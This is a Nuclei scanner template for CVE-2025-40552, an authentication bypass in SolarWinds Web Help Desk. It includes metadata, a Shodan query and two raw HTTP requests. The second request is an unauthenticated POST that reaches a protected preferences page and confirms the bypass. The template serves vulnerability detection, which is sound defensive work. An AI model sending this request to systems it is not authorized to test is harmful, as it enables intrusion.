id: CVE-2025-40552 info: name: SolarWinds Web Help Desk - Authentication Bypass author: watchTowr,DhiyaneshDk severity: critical description: | SolarWinds Web Help Desk contains an authentication bypass vulnerability caused by improper access control, letting attackers execute protected actions without authentication, exploit requires no special conditions. impact: | Attackers can execute protected actions without authentication, potentially compromising system integrity and data security. remediation: Update to the latest version of SolarWinds Web Help Desk. reference: - https://github.com/watchtowrlabs/watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553 - https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40552 - https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm - https://nvd.nist.gov/vuln/detail/CVE-2025-40552 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-40552 cwe-id: CWE-1390 epss-score: 0.08551 epss-percentile: 0.92536 metadata: verified: true max-request: 2 vendor: solarwinds product: web_help_desk shodan-query: http.favicon.hash:"1895809524" tags: cve,cve2025,solarwinds,web-help-desk,auth-bypass flow: http(1) && http(2) http: - raw: - | GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "contains_all(body, 'helpdesk','WebObjects')" - "status_code == 200" condition: and internal: true - raw: - | POST /helpdesk/WebObjects/Helpdesk.woa/wo/1.2 HTTP/1.1 Host: {{Hostname}} wopage=LookAndFeelPref matchers: - type: dsl dsl: - "contains_all(body, 'Add File','saveOptions')" - "status_code == 200" condition: and # digest: 4a0a0047304502204fd941c94c7cd109dc786e66dcea9e2328ec21dd80a679fb885a8b8725a72689022100ee21b2eaec0faa46e4ef370d79424255796becf7ff427bbf5101b8deb48cc74b:922c64590222798bb761d5b6d8e72950